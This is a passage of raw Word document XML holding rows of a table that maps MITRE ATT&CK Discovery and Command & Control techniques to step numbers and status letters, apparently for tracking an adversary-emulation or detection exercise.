      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="607BA97C" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074EC6A3" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7427125C"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F847A3"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T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64E10790" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF2BC78" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194540B6" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27EC06DD" w14:textId="29368756" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24D0272D" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="1FD67E0C" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0321E679" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46935D10"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6615FE"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T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D668053" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C7B4A6" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B880D3" w14:textId="656F5ED5" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7055BBD4" w14:textId="4455FC95" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24139F64" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="7BF4FB38" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AE471D" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72EAD236"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="358F680B"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T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5997334E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D361DFE" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="168C0D74" w14:textId="7C960E6F" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189811DA" w14:textId="3DB0A852" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF19BDC" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="1D5B9030" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00568B4F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132B01D6"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F221B1"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T1007 System Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B037F4A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6296FC" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3981FB9C" w14:textId="23B4AF3D" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40370CD4" w14:textId="03C3D8D8" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF3FDC8" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="147D9A60" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB7538F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000D71CA"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ED307E2"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T1069.001 Permission Groups Discovery: Local Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E2371B" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79D9AD78" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E52B34F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2168CB4C" w14:textId="5333809B" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C4BD6D5" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="71A5F23C" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3198050E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3006BC0F"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TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D695A5A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBBEC70" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36DB2AAF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658AD84D" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6A51F0" w14:textId="336B4FA5" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D64872" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="7876F057" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064AEA2E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03068D01" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5C0BDF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F403FCF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3814AE" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF4D3A9" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDCB1DB" w14:textId="19D06179" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
